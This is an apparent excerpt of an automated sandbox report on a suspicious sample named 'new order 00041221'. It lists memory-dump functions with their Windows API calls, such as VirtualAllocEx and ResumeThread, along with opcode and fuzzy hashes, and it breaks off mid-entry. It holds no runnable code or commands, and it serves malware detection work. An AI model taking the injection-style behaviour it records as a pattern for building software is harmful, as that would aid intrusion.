                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: c7e1e5eeb8f9961fc4d53ed452786fd0623385ce1f418f5e784076e3f9e92c5e
                                            • Instruction ID: 24b462c28893b1b6873f389ed55ed6bef34f8b93ae93cd156a7846514ed2b92c
                                            • Opcode Fuzzy Hash: c7e1e5eeb8f9961fc4d53ed452786fd0623385ce1f418f5e784076e3f9e92c5e
                                            • Instruction Fuzzy Hash: 6921E4B5D002489FDB10CF9AD884ADEBBF5FB48310F14841AE914A3350C375A940CFA5
                                            Function 06B75490 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B75506
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: b8e10703824ce20db013d74b89388c58374990dcbc1369dbbcfc23b5dec0d8e2
                                            • Instruction ID: 87b988f4d12f15b84b394938d45d478e760965342d95ac0d748d0b09ebad54bb
                                            • Opcode Fuzzy Hash: b8e10703824ce20db013d74b89388c58374990dcbc1369dbbcfc23b5dec0d8e2
                                            • Instruction Fuzzy Hash: 812136768003499FDB20DFAAC845BEEBFF5EB48320F148419E919A7250CB35A940CFA1
                                            Function 04C80460 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C80D19,00000800,00000000,00000000), ref: 04C80F2A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 45b1f8c5d8e16b7a799f91df8927b90d6974ce346ac5ed253013606d8b656fb5
                                            • Instruction ID: 6d247fc391a3bdeb01c674c334e3801029ac7d83d7af0ad1def551450482765d
                                            • Opcode Fuzzy Hash: 45b1f8c5d8e16b7a799f91df8927b90d6974ce346ac5ed253013606d8b656fb5
                                            • Instruction Fuzzy Hash: BA1112B6D003498FDB20DF9AC844B9EFBF5EB48314F15842EE919A7240C375A945CFA5
                                            Function 04C80EB8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C80D19,00000800,00000000,00000000), ref: 04C80F2A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: efec684b4645a9cd27a6ae4b57a4870dd83a3444958d5737519efb3fb6c867e5
                                            • Instruction ID: a6b8aaf072efaaa7708a08aeab911f9fa6678eca1da5ac9114c80895804b8452
                                            • Opcode Fuzzy Hash: efec684b4645a9cd27a6ae4b57a4870dd83a3444958d5737519efb3fb6c867e5
                                            • Instruction Fuzzy Hash: 1A1103B6C003498FDB10DF9AC844B9EFBF5AB48310F15842EE559A7240C379A545CFA5
                                            Function 06B75498 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B75506
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: a7ea94f3ae8e3abc346f5fcfec321d08c11aacfe7cab83d7d2d4395cdbcd4702
                                            • Instruction ID: 7b9d9717dc69d0a34238781c9c51438fcd8254e885eda501cf83e297344a1b11
                                            • Opcode Fuzzy Hash: a7ea94f3ae8e3abc346f5fcfec321d08c11aacfe7cab83d7d2d4395cdbcd4702
                                            • Instruction Fuzzy Hash: 3D112972C003499FDB20DFAAC845BDEBFF5EB48320F148419E515A7250CB759541CFA0
                                            Function 06B75309 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNELBASE(000000E2), ref: 06B75372
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 0cef6eae037aee7135183c18dc4b439a862f05e51550342655f0444eff364b51
                                            • Instruction ID: 6601f70e256a4592af4b826cb9d2c78ce3cc094e2edf1da63ef9d69604ac6625
                                            • Opcode Fuzzy Hash: 0cef6eae037aee7135183c18dc4b439a862f05e51550342655f0444eff364b51
                                            • Instruction Fuzzy Hash: F51158B1C003488FDB20DFAAC8457EEFBF5EB48320F248819D519A7250CB79A941CB94
                                            Function 04DD0F5C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,04DD15D1,?,?), ref: 04DD1778
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277443353.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4dd0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: 3e5417f2372533cb52b3713a2ebe566d65b5b29af34b9ce2cec164194b598732
                                            • Instruction ID: 145f4c39e8d8fb9cfaad7b025b2f0135a6522ae48dffaedb7148bdb416ba756b
                                            • Opcode Fuzzy Hash: 3e5417f2372533cb52b3713a2ebe566d65b5b29af34b9ce2cec164194b598732
                                            • Instruction Fuzzy Hash: 8E1155B5800349DFDB20DF9AC445BEEBBF4EB48320F208429E958A7350D738A945CFA5
                                            Function 06B75310 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNELBASE(000000E2), ref: 06B75372
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: c44c401158d25e4985cbebc3881d04dbc359e20714c333f753ea65717e7e0b40
                                            • Instruction ID: 450bd9bbe59d2ad11c178dc413b6f9ba45da613196aead897f96b8fe7ea2d860
                                            • Opcode Fuzzy Hash: c44c401158d25e4985cbebc3881d04dbc359e20714c333f753ea65717e7e0b40
                                            • Instruction Fuzzy Hash: 2F113AB1D003498FDB24DFAAC8457EEFBF5EB48320F248919D519A7250CB75A941CFA4
                                            Function 04DD171F Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,04DD15D1,?,?), ref: 04DD1778
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277443353.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4dd0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: b751ec4432c6a3e0aeb394ecf4af44e00adc321ca7e0f9ecc37079fa2ed52b70
                                            • Instruction ID: 35af0672342e99666b42067f36a761db530777c4ce29ac549ff21d14d9ce786f
                                            • Opcode Fuzzy Hash: b751ec4432c6a3e0aeb394ecf4af44e00adc321ca7e0f9ecc37079fa2ed52b70
                                            • Instruction Fuzzy Hash: DC1125B5800249CFDB20DF9AC445BDEBBF4EB48320F248419D568A7250C739A545CFA5
                                            Function 04C80C38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 04C80C9E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 251e89f27d57ed9148022bd05e0ad7c1e04453bc114727d6e2da3a763819143b
                                            • Instruction ID: 4f9f86983b3f9ce2b58205feeee8a2fd805c7d7804d52e1f0d57e1f92e899673
                                            • Opcode Fuzzy Hash: 251e89f27d57ed9148022bd05e0ad7c1e04453bc114727d6e2da3a763819143b
                                            • Instruction Fuzzy Hash: 6E1113B5C003498FDB10DF9AC444BDEFBF5EB88314F21842AD418A7210C375A545CFA5
                                            Function 06B78359 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 06B783BD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: fa821eb2683271897143b7500ff0f235697ea35142c2fc1a3f9ac5bf51b8f941
                                            • Instruction ID: 21eb06648ddbd27a2ef42d3d7326de9e9bfea8b0b5e33440cae99f2787e8910a
                                            • Opcode Fuzzy Hash: fa821eb2683271897143b7500ff0f235697ea35142c2fc1a3f9ac5bf51b8f941
                                            • Instruction Fuzzy Hash: 5511F5B5800349CFDB20DF9AD445BEEBFF4EB48310F24845AE954A7251C379A944CFA1
                                            Function 06B78360 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 06B783BD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: e15bbc746b1d4a8b00b4432e7a4b003417283d78b0a622542fb7556c0f485dc2
                                            • Instruction ID: 8639d6992da77aafa44151aa25fc8391448a3993b30f1561edf411797aea98cf
                                            • Opcode Fuzzy Hash: e15bbc746b1d4a8b00b4432e7a4b003417283d78b0a622542fb7556c0f485dc2
                                            • Instruction Fuzzy Hash: CC11D3B58003499FDB20DF9AD845BDEBFF8EB48320F208459E558A7250C379A944CFA5
                                            Function 00AFD53C Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270080358.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_afd000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15a7f7721f0b0396ef3f8ad1919fb3006922180739ab92e866151a9c0182be49
                                            • Instruction ID: 1da8cedb2a87b6c826b8c95e8db2ca62b064ab607d302f18d32e84827174eba7
                                            • Opcode Fuzzy Hash: 15a7f7721f0b0396ef3f8ad1919fb3006922180739ab92e866151a9c0182be49
                                            • Instruction Fuzzy Hash: 812125B1504208EFDB06DF50D9C0B26BF66FB94328F208569FA094F246C336D856DBA2
                                            Function 00B0D1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270131439.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b0d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bc9f040dc86e5e5b3dc7591aac49bd890598a697f35c5a15599809d71c300f1d
                                            • Instruction ID: 2d255e2a0da5c181f42ef9dd0945dd1935da74bc7bd337ac67df43344907a3cf
                                            • Opcode Fuzzy Hash: bc9f040dc86e5e5b3dc7591aac49bd890598a697f35c5a15599809d71c300f1d
                                            • Instruction Fuzzy Hash: 2F21D071A04300EFDB15DF94D9C0B26BFA5FB84314F20C6ADE8494B2D6C336D846CA61
                                            Function 00B0D0EC Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270131439.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b0d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2078521062526fb03900aaa02125bb6be51b85057bf34df126934a16b528795e
                                            • Instruction ID: 13cf97a3bef8621b65fd6d6510b9ef46d70e15fadf80dddbd0b33ed9e9ad70b8
                                            • Opcode Fuzzy Hash: 2078521062526fb03900aaa02125bb6be51b85057bf34df126934a16b528795e
                                            • Instruction Fuzzy Hash: E921F275604300AFDB04DF54D9C0B16BFA5FB84324F20C5ADD8095B2D6CB36D846CAA1
                                            Function 00AFD537 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270080358.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_afd000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                            • Instruction ID: baffbb49e56faff625a737d83b76f7b1fcde6a4e677d9d540f2c5032ed5d94ff
                                            • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                            • Instruction Fuzzy Hash: 8711D376504244CFCB06DF50D5C4B26BF72FB94324F24C6A9E9494B256C336D856CBA1
                                            Function 00B0D0E7 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270131439.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b0d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction ID: 3f36304835ad6f28bc381cbea7c6b367bdf4ed15600a7cecad72aed0e8ca6ff7
                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction Fuzzy Hash: DF118B75504280DFDB05CF54D9C4B15BFA2FB84324F24C6ADD8494B696C73AD84ACFA1
                                            Function 00B0D1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270131439.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b0d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction ID: 5988ea630d2f2da1a54ede644e670235a5ce50ffcc4719333fb59179a085859c
                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction Fuzzy Hash: 3511BB75604280DFCB05CF54C5C0B15BFA2FB84324F24C6EDD8494B696C33AD80ACB61
                                            Function 00AFD759 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270080358.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_afd000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fdc7c5d39231de9a9b7ac4c15f1e157703d27810f8cf7742a3ce83ef45b860a
                                            • Instruction ID: c79b12a6d61fcff8ed9d23945e48c4a4f0d2046afd6b1e9ebe30214fd84b1bb9
                                            • Opcode Fuzzy Hash: 7fdc7c5d39231de9a9b7ac4c15f1e157703d27810f8cf7742a3ce83ef45b860a
                                            • Instruction Fuzzy Hash: 5E01F7311043489EE7216B51CC84B36FFA9DF41321F28C55AFE080F286C3399844CAB2
                                            Function 00AFD758 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270080358.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_afd000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed518e063e6de7286469c3b09b667e9e65fc611ef94fd96b36ee4b8ec90a767e
                                            • Instruction ID: 9321e74d2be82ddd36e68d65e2fa597b01ea5d9d2755812009be071b0d312f3f
                                            • Opcode Fuzzy Hash: ed518e063e6de7286469c3b09b667e9e65fc611ef94fd96b36ee4b8ec90a767e
                                            • Instruction Fuzzy Hash: 42F0A931004344AEE7209B06C884B62FFA8EB50724F18C55AFE480F286C379A844CAA1

                                            Non-executed Functions

                                            Function 04DD7328 Relevance: .9, Instructions: 898COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277443353.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4dd0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8a9ab37cc2172563a02e4b88fb32529bfdb1ff420e15f5e7db069e1e0fbf793b
                                            • Instruction ID: 08d21dd69d225738a2948ad03eb3ca05dd16ae40907557892556f3155c94baca
                                            • Opcode Fuzzy Hash: 8a9ab37cc2172563a02e4b88fb32529bfdb1ff420e15f5e7db069e1e0fbf793b
                                            • Instruction Fuzzy Hash: 2A725B74E00219CFDB11DFA8C884AADBBF2FF88304F148599D449AB255E770E995CF91
                                            Function 04DF3B60 Relevance: .5, Instructions: 453COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277495288.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4df0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 799d597e830f2168351b11aeea461692dafb60cfd78ee2c63cd439f0dc1bc3a8
                                            • Instruction ID: 3f81aefe8bf7315705b732d6ec448ed8123ab5960cbffc7ce9c090670b9714ff
                                            • Opcode Fuzzy Hash: 799d597e830f2168351b11aeea461692dafb60cfd78ee2c63cd439f0dc1bc3a8
                                            • Instruction Fuzzy Hash: B4024A34B005158FDB28DF69C898A6ABBB2BF88750B178159EE16DB371DB31EC41CB50
                                            Function 06B7A290 Relevance: .4, Instructions: 356COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f1f85b0b5db1b40a51a3cbcf7dde7dc0e2ab72fd78e97bf43aa773d310df875
                                            • Instruction ID: c4d1e1aaf9c84e9ac94a1824e3c2c9684bb82d0c2a976b05937c6f2861cffecb
                                            • Opcode Fuzzy Hash: 4f1f85b0b5db1b40a51a3cbcf7dde7dc0e2ab72fd78e97bf43aa773d310df875
                                            • Instruction Fuzzy Hash: 8CD19EB0B006008FEBA5EB79C450B6FB7F6AF88704F2444ADD16ADB290DB35E905CB51
                                            Function 04C85868 Relevance: .3, Instructions: 315COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f4f83c7535e127c5067b02d8d9f5d9cef0bd93267525432415527cdca48ee804
                                            • Instruction ID: 77a3b0a3cae918e21c1f4d4fc7b8e5dc194ca6d93bbf0c54a0c41396d85dac52
                                            • Opcode Fuzzy Hash: f4f83c7535e127c5067b02d8d9f5d9cef0bd93267525432415527cdca48ee804
                                            • Instruction Fuzzy Hash: ED1296B1D81F45CAD338CF65E84C19D7AA1F745328BD26E09D2621A2E1E7B411EECF48
                                            Function 06B746B0 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cac6189827139e602ea43a87ad367b1c6cac2a49af6eee2dc2b6bf4134e5547d
                                            • Instruction ID: 529d378e0e486376c7c98e3983a534f7691f63bfbdecd3082c0ca92218233c6e
                                            • Opcode Fuzzy Hash: cac6189827139e602ea43a87ad367b1c6cac2a49af6eee2dc2b6bf4134e5547d
                                            • Instruction Fuzzy Hash: 58E1E9B4E002198FDB54DF99C580AAEBBF2FF49305F2481A9E818A7355D730AD41CFA4
                                            Function 06B72FD8 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fb96e34d2d77029650d6d43c58bcdcc67c01099e85325a06f8774bbe26eb29d
                                            • Instruction ID: 098de8b6e71c679e2248ad8aff7097ee0380897e36636b3f4257f6d85e820c3d
                                            • Opcode Fuzzy Hash: 7fb96e34d2d77029650d6d43c58bcdcc67c01099e85325a06f8774bbe26eb29d
                                            • Instruction Fuzzy Hash: ACE1F9B4E002198FDB14DFA9C580AAEFBF2FF49304F248199E819AB355D7319941DFA4
                                            Function 06B73410 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a396b198ab721869b298f78c87df2075231cb6aad3052523803abe46163dd0cf
                                            • Instruction ID: 05cd431f47d968d9840771aa038e0da062506c694480b72d4f7cdb75e3982fc8
                                            • Opcode Fuzzy Hash: a396b198ab721869b298f78c87df2075231cb6aad3052523803abe46163dd0cf
                                            • Instruction Fuzzy Hash: 58E1E9B4E002198FDB14DFA9C5809AEFBF2FF49304F248199E818AB355D7359941DF64
                                            Function 06B74AE8 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 935ef170f662366510348d3115ad576040b88416c4915fa89cf90bc08fff89aa
                                            • Instruction ID: 74117dc1f0fda623bcbfa6c50726b7abebcb0ac78ea8bf81d9d0260c29da3f08
                                            • Opcode Fuzzy Hash: 935ef170f662366510348d3115ad576040b88416c4915fa89cf90bc08fff89aa
                                            • Instruction Fuzzy Hash: F4E1D974E002198FDB14DFA9C580AAEBBF2FF89305F248199E858AB355D730AD41CF65
                                            Function 06B72BA0 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f16a534e3916b6eced829706466bc432893d1ea5397f4af53bae10e740690c1
                                            • Instruction ID: fd9511e282178472061735f02f40acfab7aefb34098ebbc93b8711eff7ccd706
                                            • Opcode Fuzzy Hash: 0f16a534e3916b6eced829706466bc432893d1ea5397f4af53bae10e740690c1
                                            • Instruction Fuzzy Hash: CFE1C9B4E006198FDB14DFA9C580AAEFBF2FF89304F248199E818AB355D7349941CF65
                                            Function 04DFB250 Relevance: .3, Instructions: 272COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277495288.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4df0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e6d75bc875d6a0f15b86b98dd7449e0a727c7e27e17d785fb79a37c6fd3889a
                                            • Instruction ID: ea3d61bef043b6cf73f327d14a911cad24c99a2620c7ad076fd39ffb39ff6fce
                                            • Opcode Fuzzy Hash: 6e6d75bc875d6a0f15b86b98dd7449e0a727c7e27e17d785fb79a37c6fd3889a
                                            • Instruction Fuzzy Hash: 79D14A35D10B1ACADB11EBA4D950A99F7B1FF95301F108B9AE14A37214EB706AC9CF81
                                            Function 04DDE4F4 Relevance: .3, Instructions: 270COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277443353.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4dd0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 205b9ad7499f01c753979155e431c4c476f2c8a4ec5796bb9e73d9b73b221829
                                            • Instruction ID: e1d5dccdcd51f168068b597070d88a803a69f060c86af4c3c7a4e67a42bd964c
                                            • Opcode Fuzzy Hash: 205b9ad7499f01c753979155e431c4c476f2c8a4ec5796bb9e73d9b73b221829
                                            • Instruction Fuzzy Hash: E9A19F70E04A15CFDB10CF98C880AADB7F1FB48310F258666E455EF295E338E942DB91
                                            Function 04DFB260 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
